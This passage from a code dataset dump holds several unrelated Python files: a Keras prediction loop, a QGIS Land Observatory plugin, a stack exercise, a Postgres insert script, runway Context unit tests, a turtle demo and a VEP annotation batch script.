mydiff(mydiff(kpts_test_siamese))\n\ncombo_train = {}\ncombo_val = {}\ncombo_test = {}\nfor ii in range(__VIDEO_SEQ_LEN__):\n combo_train['frame_'+str(ii)] = np.concatenate((kpts_train_siamese['frame_'+str(ii)], diff_train['frame_'+str(ii)], diff2_train['frame_'+str(ii)], train_feats_siamese['frame_'+str(ii)]), axis=1)\n combo_val['frame_'+str(ii)] = np.concatenate((kpts_val_siamese['frame_'+str(ii)], diff_val['frame_'+str(ii)], diff2_val['frame_'+str(ii)], val_feats_siamese['frame_'+str(ii)]), axis=1)\n combo_test['frame_'+str(ii)] = np.concatenate((kpts_test_siamese['frame_'+str(ii)], diff_test['frame_'+str(ii)], diff2_test['frame_'+str(ii)], test_feats_siamese['frame_'+str(ii)]), axis=1)\n\nif __EMOTIONS__:\n emotion_train = keras.utils.to_categorical(emotion_train, __N_CLASSES__)\n emotion_val = keras.utils.to_categorical(emotion_val, __N_CLASSES__)\n\n y_train = {'out_arousal': arousal_train, 'out_valence': valence_train, 'out_categorical': emotion_train}\n y_val = {'out_arousal': arousal_val, 'out_valence': valence_val, 'out_categorical': emotion_val}\nelse:\n y_train = {'out_arousal': arousal_train, 'out_valence': valence_train}\n y_val = {'out_arousal': arousal_val, 'out_valence': valence_val}\n\n## Grid parameters\ngrid_param = collections.OrderedDict()\ngrid_param = {'loss_weights': [{'out_arousal': 1., 'out_valence': 1., 'out_categorical': .1}, \\\n {'out_arousal': 1., 'out_valence': .5, 'out_categorical': .1}, \\\n {'out_arousal': .5, 'out_valence': .1, 'out_categorical': .1}, \\\n {'out_arousal': 1., 'out_valence': .25, 'out_categorical': .05}, \\\n {'out_arousal': .25, 'out_valence': .1, 'out_categorical': .05}], \\\n 'l2_reg': np.float32(np.logspace(-3, -5, 3)),\\\n 'n_dense': [1, 2, 3], \\\n 'hidden_dim': [256, 512]}\n\ncombinations = list(itertools.product(*(grid_param[k] for k in sorted(grid_param))))\nprint(\">> GRID combos: \", len(combinations))\nf_grid_fn = __RES_FN__ + 'grid_kpts_wo_norm.log'\nfor idx, combo in enumerate(combinations):\n print('>> COMBO: ' + str(idx))\n dict_combo = {k: combo[i] for i, k in enumerate(sorted(grid_param))}\n print(\"combo \" + str(idx) + ': ', dict_combo)\n\n ## MLP MODEL\n top_modelpath= __MODELS_FN__ + str(idx) + '_model_top_ktps.h5'\n siamese_mlp = load_model(top_modelpath, custom_objects={'my_ccc_loss': my_ccc_loss})\n\n # predictions\n preds = siamese_mlp.predict(combo_test)\n preds_arousal = preds[0].ravel()[aligned_test_indexes]\n 
preds_valence = preds[1].ravel()[aligned_test_indexes]\n\n # save predtions to csv\n csv_fn = __RES_FN__ + str(idx) + '_preds_model_top_ktps.csv'\n preds2csv(csv_fn, test_gt_fn, preds_arousal, preds_valence)\n \n K.clear_session()\n","sub_path":"video_modality/landmarks_predict.py","file_name":"landmarks_predict.py","file_ext":"py","file_size_in_byte":10068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"309481181","text":"\"\"\"\n/***************************************************************************\nlo-editor\nA QGIS plugin to add and edit spatial information to land deals on the Land\nObservatory platform.\n -------------------\nbegin : 2012-07-02\ncopyright : (C) 2012 by Adrian Weber\nemail : adrian.weber@cde.unibe.ch\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\"\"\"\n\nfrom PyQt4.QtCore import QObject\nfrom PyQt4.QtCore import QRegExp\nfrom PyQt4.QtCore import QSettings\nfrom PyQt4.QtCore import QString\nfrom PyQt4.QtCore import SIGNAL\nfrom PyQt4.QtGui import QMessageBox\nfrom RequestManager import RequestManager\nfrom models import Activity\nfrom models import Stakeholder\nfrom models import Tag\nfrom models import TagGroup\nimport os\nfrom protocols import ActivityProtocol\nfrom protocols import StakeholderProtocol\nfrom qgis.core import QGis\nfrom qgis.core import QgsFeature\nfrom qgis.core import QgsField\nfrom qgis.core import QgsGeometry\nfrom qgis.core import QgsMapLayer\nfrom qgis.core import QgsMapLayerRegistry\nfrom qgis.core import QgsPoint\nfrom qgis.core import QgsVectorLayer\nimport simplejson as json\n\nclass StakeholderRequestManager(RequestManager):\n\n configFile = \"landmatrix.stakeholder.ini\"\n\n def __init__(self, host, user, pw):\n RequestManager.__init__(self, host, user, pw)\n\n self.stakeholderProtocol = StakeholderProtocol(host, user, pw)\n\n\n def getStakeholders(self):\n # Connect to the stylePosted signal emitted by the GeoServer object\n self.connect(self.stakeholderProtocol, SIGNAL(\"readSignal( bool, int, QString )\"), self.getStakeholdersFinished)\n\n url = self.stakeholderProtocol.read(queryable=\"Name,Country\", Name__ilike='Heng', Country__ilike='cambodia')\n self.log(url)\n\n def getStakeholdersFinished(self, success, statusCode, response):\n\n # It's necessary to disconnect this signal again\n self.disconnect(self.stakeholderProtocol, SIGNAL(\"readSignal( bool, int, QString )\"), self.getStakeholdersFinished)\n\n if success:\n # Parse the result\n stakeholders = self.parseStakeholdersResponse(response)\n\n # Get the first Uuid of the list\n if len(stakeholders) >= 1:\n self.log(stakeholders[0].id().toString())\n\n def parseStakeholdersResponse(self, jsonBody):\n\n stakeholders = []\n\n data = json.loads(str(jsonBody))\n for stakeholder in data['data']:\n\n s = Stakeholder(id=stakeholder['id'], version=stakeholder['version'])\n\n for taggroup in stakeholder['taggroups']:\n tg = TagGroup(id=taggroup['id'])\n mainTag = taggroup['main_tag']\n tg.setMainTag(Tag(id=mainTag['id'], key=mainTag['key'], 
value=mainTag['value']))\n\n for tag in taggroup['tags']:\n t = Tag(id=tag['id'], key=tag['key'], value=tag['value'])\n tg.addTag(t)\n\n s.addTagGroup(tg)\n\n stakeholders.append(s)\n\n return stakeholders\n\n def addStakeholders(self):\n self.connect(self.stakeholderProtocol, SIGNAL(\"created( bool, int, QString\"), self.addStakeholdersFinished)\n\n # Dummy stakeholder\n s = Stakeholder()\n tag = Tag(key=\"Name\", value=\"Adrian Weber Investment\")\n tagGroup = TagGroup()\n tagGroup.setMainTag(tag)\n tagGroup.addTag(tag)\n tagGroup.addTag(Tag(key=\"Country\", value=\"Swaziland\"))\n s.addTagGroup(tagGroup)\n\n msg, rawBody = self.stakeholderProtocol.add(s)\n self.log(msg)\n self.log(rawBody)\n\n def addStakeholdersFinished(self, success, statusCode, response):\n\n # Disconnect this signal\n self.disconnect(self.stakeholderProtocol, SIGNAL(\"created( bool, int, QString\"), self.addStakeholdersFinished)\n\n self.log(statusCode)\n\n def addStakeholdersFromLayer(self):\n \"\"\"\n Import all stakeholders from the active layer to the Land Observatory\n platform.\n It is not (yet) tested if a stakeholder already exists or not.\n \"\"\"\n\n # Connect to the protocol to get noticed as soon as the stakeholder has\n # been created\n self.connect(self.stakeholderProtocol, SIGNAL(\"created( bool, int, QString\"), self.addStakeholdersFinished)\n\n # Get the dict maps the attribute names from the landmatrix input Shapefile to the\n # fields defined in the global definition yaml\n identifierColumn, transformMap, groups = self.getTagGroupsConfiguration(\"landmatrix.stakeholder.ini\")\n\n # Get the active layer and its data provider\n layer = self.iface.activeLayer()\n provider = layer.dataProvider()\n\n # The current feature\n feature = QgsFeature()\n\n # List of attribute indexes to select\n attributeIndexes = []\n # Dict that maps the field index to the fields defined in the global YAML\n fieldIndexMap = {}\n for (i, field) in provider.fields().iteritems():\n if str(field.name()) in transformMap:\n attributeIndexes.append(i)\n fieldIndexMap[i] = transformMap[str(field.name())]\n\n # Start data retreival: fetch geometry and necessary attributes for each feature\n provider.select(attributeIndexes)\n\n stakeholders = []\n\n # retreive every feature with its geometry and attributes\n while provider.nextFeature(feature):\n\n tagGroups = list(TagGroup() for i in range(len(groups)))\n\n # fetch map of attributes\n attrs = feature.attributeMap()\n\n # attrs is a dictionary: key = field index, value = QgsFeatureAttribute\n # show all attributes and their values\n for (k, attr) in attrs.iteritems():\n self.log(\"%s: %s\" % (fieldIndexMap[k], attr.toString()))\n\n # First search the correct taggroup to append\n attributeName = provider.fields()[k].name()\n currentTagGroup = 0\n for g in groups:\n if attributeName in g:\n break\n else:\n currentTagGroup += 1\n\n if attr is not None and attr.toString() != '':\n tag = Tag(key=fieldIndexMap[k], value=attr.toString())\n tagGroups[currentTagGroup].addTag(tag)\n if tagGroups[currentTagGroup].mainTag() is None:\n tagGroups[currentTagGroup].setMainTag(tag)\n\n s = Stakeholder()\n for tg in tagGroups:\n if len(tg.tags) > 0:\n s.addTagGroup(tg)\n\n stakeholders.append(s)\n\n msg, rawBody = self.stakeholderProtocol.add(stakeholders)\n self.log(msg)\n self.log(rawBody)\n\n # Disconnect the signal\n self.disconnect(self.stakeholderProtocol, SIGNAL(\"created( bool, int, QString\"), self.addStakeholdersFinished)\n\n def addStakeholdersFromLayerFinished(self, success, statusCode, 
response):\n\n if success:\n pass\n","sub_path":"src/StakeholderRequestManager.py","file_name":"StakeholderRequestManager.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"65968564","text":"class Stack:\r\n def __init__(self, max_size):\r\n self.__max_size = max_size\r\n self.__elements = [None] * self.__max_size\r\n self.__top = -1\r\n\r\n def is_full(self):\r\n if (self.__top == self.__max_size - 1):\r\n return True\r\n return False\r\n\r\n def is_empty(self):\r\n if (self.__top == -1):\r\n return True\r\n return False\r\n\r\n def push(self, data):\r\n if (self.is_full()):\r\n print(\"The stack is full!!\")\r\n else:\r\n self.__top += 1\r\n self.__elements[self.__top] = data\r\n\r\n def pop(self):\r\n if (self.is_empty()):\r\n print(\"The stack is empty!!\")\r\n else:\r\n data = self.__elements[self.__top]\r\n self.__top -= 1\r\n return data\r\n\r\n def display(self):\r\n if (self.is_empty()):\r\n print(\"The stack is empty\")\r\n else:\r\n index = self.__top\r\n while (index >= 0):\r\n print(self.__elements[index])\r\n index -= 1\r\n\r\n def get_max_size(self):\r\n return self.__max_size\r\n\r\n # You can use the below __str__() to print the elements of the DS object while debugging\r\n\r\n def __str__(self):\r\n msg = []\r\n index = self.__top\r\n while (index >= 0):\r\n msg.append((str)(self.__elements[index]))\r\n index -= 1\r\n msg = \" \".join(msg)\r\n msg = \"Stack data(Top to Bottom): \" + msg\r\n return msg\r\n\r\ndef fun(input_stack):\r\n num = input_stack.get_max_size() -1\r\n num1 = 1\r\n while (num > 0):\r\n top_element = input_stack.pop()\r\n temp_stack = Stack(input_stack.get_max_size())\r\n num2 = 1\r\n while (num2 <= num1):\r\n element = input_stack.pop()\r\n temp_stack.push(element + top_element)\r\n num2 += 1\r\n while (temp_stack.is_empty() is False):\r\n input_stack.push(temp_stack.pop())\r\n input_stack.push(top_element)\r\n num1 += 1\r\n num -= 1\r\n return input_stack\r\n\r\n\r\nsample = Stack(5)\r\nsample.push(8)\r\nsample.push(2)\r\nsample.push(6)\r\nsample.push(7)\r\nsample.push(10)\r\nresult_stack = fun(sample)\r\nresult_stack.display()\r\n\r\n\r\n","sub_path":"figure_out_how.py","file_name":"figure_out_how.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"541130386","text":"class DataAnalysis(object):\n\n\tdef __init__(self,inputDataFrame):\n\n\t\tself.inputDataFrame = inputDataFrame\n\n\t\treturn None\n\n\tdef plotReturns(self,StockNum,RetNum):\n\n\t\t'''\n\t\tInput: StockNum - which stock to plot\n\t\t\t RetNum - how many returns to plot\n\t\tOutput: Figure with desired returns\n\n\t\t'''\n\n\t\t# plot the current day D returns\n\n\t\timport matplotlib.pyplot as plt\n\n\t\tdataField = self.inputDataFrame[self.inputDataFrame['Id']==StockNum]\n\n\t\t# select the returns to plot\n\n\t\tplotRet = []\n\n\t\tfor j in xrange(2,RetNum):\n\n\t\t\tRetString = 'Ret_' + str(j)\n\n\t\t\tplotRet.append(dataField[RetString])\n\n\t\tplt.figure()\n\t\tplt.title('%s Returns of %s Stock'%(RetNum,StockNum))\n\t\tplt.plot(plotRet,'r')\n\t\tplt.show()\n\n\t\treturn 'The figure was plotted!'","sub_path":"DataAnalysis.py","file_name":"DataAnalysis.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"413526819","text":"import json \nimport os \nimport psycopg2\nimport 
psycopg2.extras\n\nconn = psycopg2.connect(\n    host=os.getenv(\"FRINX_HOST\", \"localhost\"),\n    database=os.getenv(\"FRINX_DATABASE\", \"postgres\"),\n    user=os.getenv(\"FRINX_USER\", \"postgres\"),\n    password=os.getenv(\"FRINX_PASSWORD\", \"tutorial\")\n)\ncursor = conn.cursor()  # cursor is a method and must be called\ndata = []\nwith open('data.json') as f:\n    for line in f:\n        data.append(json.loads(line))\n\n# Column names of the target table; the commas are required, otherwise adjacent\n# string literals silently concatenate into a single bogus field name.\nfields = [\n    \"id\",              #SERIAL PRIMARY KEY,\n    \"connection\",      #INTEGER,\n    \"name\",            #VARCHAR(255) NOT NULL,\n    \"description\",     #VARCHAR(255),\n    \"config\",          #json,\n    \"type\",            #VARCHAR(50),\n    \"infra_type\",      #VARCHAR(50),\n    \"port_channel_id\", #INTEGER,\n    \"max_frame_size\"   #INTEGER\n]\nfor item in data:\n    my_data = [item[field] for field in fields]\n    for i, v in enumerate(my_data):\n        if isinstance(v, dict):\n            my_data[i] = json.dumps(v)\n    # one %s placeholder per column\n    insert_query = \"INSERT INTO crm VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n    cursor.execute(insert_query, tuple(my_data))\nconn.commit()  # persist the inserts before closing\ncursor.close()\nconn.close()","sub_path":"frinx.py","file_name":"frinx.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"203669498","text":"\"\"\"Tests for context module.\"\"\"\n# pylint: disable=protected-access,no-self-use\nimport logging\n\nfrom mock import patch\n\nfrom runway.context import Context\n\nLOGGER = logging.getLogger('runway')\n\nTEST_CREDENTIALS = {\n    'AWS_ACCESS_KEY_ID': 'foo',\n    'AWS_SECRET_ACCESS_KEY': 'bar',\n    'AWS_SESSION_TOKEN': 'foobar'\n}\n\n\nclass TestContext(object):\n    \"\"\"Test Context class.\"\"\"\n\n    def test_boto3_credentials(self):\n        \"\"\"Test boto3_credentials.\"\"\"\n        context = Context(env_name='test',\n                          env_region='us-east-1',\n                          env_root='./',\n                          env_vars=TEST_CREDENTIALS.copy())\n\n        assert context.boto3_credentials == {key.lower(): value\n                                             for key, value in\n                                             TEST_CREDENTIALS.items()}\n\n    def test_current_aws_creds(self):\n        \"\"\"Test current_aws_creds.\"\"\"\n        context = Context(env_name='test',\n                          env_region='us-east-1',\n                          env_root='./',\n                          env_vars=TEST_CREDENTIALS.copy())\n\n        assert context.current_aws_creds == TEST_CREDENTIALS\n\n    def test_is_interactive(self):\n        \"\"\"Test is_interactive.\"\"\"\n        context = Context(env_name='test',\n                          env_region='us-east-1',\n                          env_root='./',\n                          env_vars={'NON_EMPTY': '1'})\n        assert context.is_interactive\n\n        context.env_vars['CI'] = '1'\n        assert not context.is_interactive\n\n    def test_is_noninteractive(self):\n        \"\"\"Test is_noninteractive.\"\"\"\n        context = Context(env_name='test',\n                          env_region='us-east-1',\n                          env_root='./',\n                          env_vars={'NON_EMPTY': '1'})\n        assert not context.is_noninteractive\n\n        context.env_vars['CI'] = '1'\n        assert context.is_noninteractive\n\n    def test_is_python3(self):\n        \"\"\"Test is_python3.\"\"\"\n        from runway.context import sys\n        context = Context(env_name='test',\n                          env_region='us-east-1',\n                          env_root='./')\n\n        with patch.object(sys, 'version_info') as version_info:\n            version_info.major = 2\n            assert not context.is_python3\n\n        with patch.object(sys, 'version_info') as version_info:\n            version_info.major = 3\n            assert context.is_python3\n\n    def test_max_concurrent_cfngin_stacks(self):\n        \"\"\"Test max_concurrent_cfngin_stacks.\"\"\"\n        context = Context(env_name='test',\n                          env_region='us-east-1',\n                          env_root='./')\n        assert context.max_concurrent_cfngin_stacks == 0\n\n        context.env_vars['RUNWAY_MAX_CONCURRENT_CFNGIN_STACKS'] = '1'\n        assert context.max_concurrent_cfngin_stacks == 1\n\n    def test_max_concurrent_modules(self):\n        \"\"\"Test max_concurrent_modules.\"\"\"\n        context = 
Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars={'RUNWAY_MAX_CONCURRENT_MODULES': '1'})\n assert context.max_concurrent_modules == 1\n\n del context.env_vars['RUNWAY_MAX_CONCURRENT_MODULES']\n\n with patch('runway.context.multiprocessing.cpu_count') as cpu_count:\n cpu_count.return_value = 8\n assert context.max_concurrent_modules == 8\n\n def test_max_concurrent_regions(self):\n \"\"\"Test max_concurrent_regions.\"\"\"\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars={'RUNWAY_MAX_CONCURRENT_REGIONS': '1'})\n assert context.max_concurrent_regions == 1\n\n del context.env_vars['RUNWAY_MAX_CONCURRENT_REGIONS']\n\n with patch('runway.context.multiprocessing.cpu_count') as cpu_count:\n cpu_count.return_value = 8\n assert context.max_concurrent_regions == 8\n\n def test_use_concurrent(self):\n \"\"\"Test use_concurrent.\"\"\"\n from runway.context import sys\n context = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars={'NON_EMPTY': '1'})\n context_ci = Context(env_name='test',\n env_region='us-east-1',\n env_root='./',\n env_vars={'CI': '1'})\n\n with patch.object(sys, 'version_info') as version_info:\n version_info.major = 2\n assert not context.use_concurrent\n assert not context_ci.use_concurrent\n\n with patch.object(sys, 'version_info') as version_info:\n version_info.major = 3\n assert not context.use_concurrent\n assert context_ci.use_concurrent\n\n def test_init_name_from_arg(self):\n \"\"\"_env_name_from_env should be false when DEPLOY_ENVIRONMENT not set.\"\"\"\n context = Context(env_name='test', env_region='us-east-1',\n env_root='./')\n assert context.env_name == 'test'\n assert context.env_vars['DEPLOY_ENVIRONMENT'] == context.env_name, \\\n 'env_vars.DEPLOY_ENVIRONMENT should be set from env_name'\n assert not context._env_name_from_env, \\\n 'should be false when env_name was not derived from env_var'\n\n def test_init_from_envvar(self):\n \"\"\"_env_name_from_env should be true when DEPLOY_ENVIRONMENT is set.\"\"\"\n context = Context(env_name='test', env_region='us-east-1',\n env_root='./', env_vars={'DEPLOY_ENVIRONMENT': 'test'})\n assert context.env_name == 'test'\n assert context.env_vars['DEPLOY_ENVIRONMENT'] == context.env_name, \\\n 'env_vars.DEPLOY_ENVIRONMENT should be set from env_name'\n assert context._env_name_from_env, \\\n 'should be true when env_name was not derived from env_var'\n\n def test_echo_detected_environment_not_env(self, caplog):\n \"\"\"Environment helper note when DEPLOY_ENVIRONMENT is not set.\"\"\"\n context = Context(env_name='test', env_region='us-east-1',\n env_root='./')\n expected = ['',\n 'Environment \"test\" was determined from the '\n 'current git branch or parent directory.',\n 'If this is not the environment name, update '\n 'the branch/folder name or set an override value via the '\n 'DEPLOY_ENVIRONMENT environment variable',\n '']\n\n with caplog.at_level(logging.INFO):\n context.echo_detected_environment()\n\n assert [rec.message for rec in caplog.records] == expected\n\n def test_echo_detected_environment_from_env(self, caplog):\n \"\"\"Environment helper note when DEPLOY_ENVIRONMENT is set.\"\"\"\n context = Context(env_name='test', env_region='us-east-1',\n env_root='./', env_vars={'DEPLOY_ENVIRONMENT': 'test'})\n expected = ['',\n 'Environment \"test\" was determined from the '\n 'DEPLOY_ENVIRONMENT environment variable.',\n 'If this is not correct, update the value (or '\n 'unset it to fall back to the name of the current git 
'\n 'branch or parent directory).',\n '']\n\n with caplog.at_level(logging.INFO):\n context.echo_detected_environment()\n\n assert [rec.message for rec in caplog.records] == expected\n\n def test_save_existing_iam_env_vars(self):\n \"\"\"Test save_existing_iam_env_vars.\"\"\"\n context = Context(env_name='dev', env_region='us-east-1',\n env_root='./', env_vars=TEST_CREDENTIALS.copy())\n context.save_existing_iam_env_vars()\n assert context.env_vars['OLD_AWS_ACCESS_KEY_ID'] == 'foo'\n assert context.env_vars['OLD_AWS_SECRET_ACCESS_KEY'] == 'bar'\n assert context.env_vars['OLD_AWS_SESSION_TOKEN'] == 'foobar'\n","sub_path":"tests/test_context.py","file_name":"test_context.py","file_ext":"py","file_size_in_byte":8135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"118831717","text":"import turtle\n\nwn = turtle.Screen() # create a screen\nwn.bgcolor(\"yellow\") # set the screen background color\ny = turtle.Turtle() # create a turtle object\ny.shape(\"turtle\") # define the shape of the obj\ny.speed(3) # speed of animation (if 0 then maximum speed)\ndist = 10\ny.up() # penup, this will avoid the trace formation\nfor x in range(200): # for loop for helix\n y.forward(dist)\n y.left(90)\n y.stamp() # a stamp of the selected shape will be made at this point\n dist += 10\n\nturtle.done() # required in pycharm for turtle screen formation\n","sub_path":"src/myfirstprogram.py","file_name":"myfirstprogram.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"70274490","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# mv.py\n# made by Min-Seok Kwon\n# 2019-12-29 17:37:50\n#########################\nimport time\nimport sys\nimport os\nSVRNAME = os.uname()[1]\nif \"MBI\" in SVRNAME.upper():\n sys_path = \"/Users/pcaso/bin/python_lib\"\nelif SVRNAME == \"T7\":\n sys_path = \"/ms1/bin/python_lib\"\nelse:\n sys_path = \"/home/mk446/bin/python_lib\"\nsys.path.append(sys_path)\n\n\ndef run():\n for d1 in file_util.listdir('./'):\n if 'chr' in d1:\n for d2 in file_util.listdir('./' + d1):\n # print(d1 + '/' + d2)\n cmd = \"python \" + path + \"mv.py \" + d1 + '/' + d2\n print(cmd)\n # for fname in file_util.listdir('./' + d1 + '/' + d2, '.vep.sh'):\n # f1 = path + d1 + '/' + d2 + '/' + fname\n # # print(f1)\n # cmd = \"mv \" + f1 + ' ' + f1.replace('.vep.sh', '.vep.txt')\n # # print(cmd)\n # proc_util.run_cmd(cmd)\n # break\n # break\n\n\ndef mv(d1):\n for fname in file_util.listdir(path + d1, '.vcf'):\n f1 = path + d1 + '/' + fname\n # print(f1)\n vcf = path + d1 + '/' + fname\n vep = path + d1 + '/' + fname + '.vep.txt'\n cmd = \"mv \" + f1 + ' ' + f1.replace('.vep.sh', '.vep.txt')\n cmd = \"python /home/mk446/mutanno/SRC/mutanno.py precal -check_vep_result -vcf \" + vcf + \" -vep_result \" + vep\n # print(cmd)\n print(proc_util.run_cmd(cmd, True))\n\n\ndef s11_check_undone(d1):\n vcflist = []\n for fname in file_util.listdir(path + d1, '.vcf'):\n vcf = path + d1 + '/' + fname\n if not file_util.is_exist(vcf + '.vep.txt.checked'):\n cnt = 0\n for line in open(vcf):\n if line[0] != '#':\n cnt += 1\n if cnt > 0:\n vcflist.append(vcf)\n out = path + 'checked_' + d1.replace('/', '_')\n file_util.fileSave(out, '\\n'.join(vcflist), 'w')\n\n\ndef s12_merge_checked():\n for fname in file_util.listdir('./'):\n if 'checked_chr' in fname:\n # print(fname)\n if file_util.getFileSize(fname) > 0:\n flist = file_util.fileOpen(fname).split('\\n')\n cmd = \"\"\n for 
inputvcf in flist:\n out = inputvcf + '.vep.txt'\n cmd += \"/home/mk446/bin/vep -i \" + inputvcf + \" -o \" + out + \" --hgvs \"\n cmd += \"--fasta \" + fasta + \" --assembly GRCh38 --use_given_ref \"\n cmd += \"--offline --cache_version 98 --dir_cache \" + vepcache + \" \"\n cmd += \"--plugin MaxEntScan,/home/mk446/bio/mutanno/ANNOT3TOOLS/BIN/VEP_plugins-release-98/MaxEntScan/fordownload \"\n cmd += \"--plugin TSSDistance \"\n cmd += \"--everything --force_overwrite --tab;\\n\"\n print(cmd.strip())\n\n\ndef s13_getvcflist(d1):\n vcflist = []\n for fname in file_util.listdir(path + d1, '.vcf'):\n vcf = d1 + '/' + fname\n vcflist.append(vcf)\n out = path + 'vcf_' + d1.replace('/', '_')\n file_util.fileSave(out, '\\n'.join(vcflist) + '\\n', 'w')\n\n\ndef s14_merge_vcflist():\n for chrom in seq_util.MAIN_CHROM_LIST:\n # print(chrom)\n if chrom == \"MT\":\n chrom = \"M\"\n for k in range(1000):\n listfile = \"./vcflist/vcf_chr\" + chrom + \"_\" + str(k)\n if file_util.is_exist(listfile):\n if k == 0:\n cmd = \"cat \" + listfile + \" > vcflist_chr\" + chrom\n else:\n cmd = \"cat \" + listfile + \" >> vcflist_chr\" + chrom\n print(cmd)\n\n proc_util.run_cmd(cmd)\n\n\ndef s15_check_rerun():\n for line in open('r.sh'):\n arr = line.split(' ')\n vcf = arr[2]\n vep = arr[4]\n if not file_util.is_exist(vep):\n # print(vcf)\n cntvar = 0\n header = ''\n for line in open(vcf):\n if line[0] != '#':\n arr = line.split('\\t')\n if arr[3].strip() != '':\n cntvar += 1\n else:\n header = line\n # print(header)\n if cntvar == 0:\n # print(vcf)\n # file_util.fileSave(vep + '.checked', '', 'w')\n # file_util.fileSave(vcf, header, 'w')\n pass\n else:\n if file_util.is_exist(vep + '.error'):\n # print(vcf)\n cmd = \"rm \" + vep + '.error'\n # print(proc_util.run_cmd(cmd))\n\n cmd = \"python /home/mk446/mutanno/SRC/mutanno.py precal -check_vep_result -vcf \" + vcf + \" -vep_result \" + vep\n # print(cmd)\n # print(proc_util.run_cmd(cmd))\n\n cmd = \"/home/mk446/bin/vep -i \" + vcf + \" -o \" + vep + \" --hgvs \"\n cmd += \"--fasta \" + fasta + \" --assembly GRCh38 --use_given_ref \"\n cmd += \"--offline --cache_version 98 --dir_cache \" + vepcache + \" \"\n cmd += \"--plugin MaxEntScan,/home/mk446/bio/mutanno/ANNOT3TOOLS/BIN/VEP_plugins-release-98/MaxEntScan/fordownload \"\n cmd += \"--plugin TSSDistance \"\n cmd += \"--everything --force_overwrite --tab;\"\n print(cmd)\n pass\n else:\n # print(vcf)\n pass\n\n\ndef s16_vcfgz():\n for line in file_util.gzopen(\"vcflist.gz\"):\n line = line.decode('UTF-8')\n # cmd = \"tabixgz \" + path + line.strip()\n vcf = path + line.strip()\n vep = vcf + '.vep.txt'\n # if file_util.is_exist(vcf) and file_util.is_exist(vcf+'.gz') and file_util.is_exist(vcf+'.gz.tbi'):\n # cmd = \"rm \" + vcf\n # # cmd = \"rm \" + path + line.strip() + \".vep.sh_summary.html\"\n # print(cmd)\n # proc_util.run_cmd(cmd)\n\n if file_util.is_exist(vep) and file_util.is_exist(vep + '.checked') and file_util.is_exist(vep + '.done'):\n cmd = \"gz \" + vep\n print(cmd)\n\n\ndef s17_vep2tab():\n for line in file_util.gzopen(\"vcflist.gz\"):\n line = line.decode('UTF-8')\n vcf = path + line.strip()\n vep = vcf + '.vep.txt'\n tab = vcf + '.vep.tab'\n # if file_util.is_exist(vep):\n if True:\n cmd = \"python /home/mk446/mutanno/SRC/mutanno.py convert -vep2tab\"\n cmd += \" -in \" + vep + '.gz'\n cmd += \" -out \" + tab\n cmd += \";\\n\"\n # cmd += \"tabixgz \" + tab + \";\"\n print(cmd)\n # break\n\n\ndef s18_gz(d1):\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + '/' + fname\n vep 
= vcf + '.vep.txt'\n # if file_util.is_exist(vcf):\n # cmd = \"tabixgz \" + vcf\n # proc_util.run_cmd(cmd)\n # print(cmd)\n\n # vep = path + d1 + '/' + fname\n # if file_util.is_exist(vep) and file_util.is_exist(vep + '.checked') and file_util.is_exist(vep + '.done'):\n # cmd = \"gz \" + vep\n # proc_util.run_cmd(cmd)\n # print(cmd)\n # tab = vep.replace('.vep.txt', '.vep.tab')\n tab = vcf + '.vep.tab'\n if file_util.is_exist(tab):\n cmd = \"tabixgz \" + tab\n proc_util.run_cmd(cmd)\n print(cmd)\n print('sleep 60')\n time.sleep(60)\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + '/' + fname\n # vep = path + d1 + '/' + fname\n vep = vcf + '.vep.txt'\n tab = vcf + '.vep.tab'\n if file_util.is_exist(vcf) and file_util.is_exist(vcf + '.gz') and file_util.is_exist(vcf + '.gz.tbi'):\n cmd = \"rm \" + vcf\n proc_util.run_cmd(cmd)\n print(cmd)\n # tab = vep.replace('.vep.txt', '.vep.tab')\n # if file_util.is_exist(vep) and file_util.is_exist(vep+'.gz') and file_util.is_exist(vep + '.checked') and file_util.is_exist(vep + '.done'):\n # cmd = \"rm \" + vep\n # proc_util.run_cmd(cmd)\n # print(cmd)\n if file_util.is_exist(tab) and file_util.is_exist(tab + '.gz') and file_util.is_exist(tab + '.gz.tbi'):\n cmd = \"rm \" + tab\n proc_util.run_cmd(cmd)\n print(cmd)\n\n\ndef s19_vep2tab(d1):\n flag_sleep = False\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = path + d1 + \"/\" + fname.replace('.vcf.gz', '.vcf')\n vep = vcf + '.vep.txt'\n tab = vcf + '.vep.tab'\n # print(vep + \".gz\")\n if file_util.is_exist(vep + \".gz\") and not (file_util.is_exist(tab + \".gz\") and file_util.is_exist(tab + \".gz.tbi\")):\n cmd = \"python /home/mk446/mutanno/SRC/mutanno.py convert -vep2tab\"\n cmd += \" -in \" + vep + '.gz'\n cmd += \" -out \" + tab\n cmd += \";\\n\"\n # cmd += \"tabixgz \" + tab + \";\"\n print(cmd)\n proc_util.run_cmd(cmd)\n flag_sleep = True\n if flag_sleep:\n print('sleep 60')\n time.sleep(60)\n flag_sleep = False\n\n for fname in file_util.listdir(path + d1, '.vcf.gz'):\n vcf = 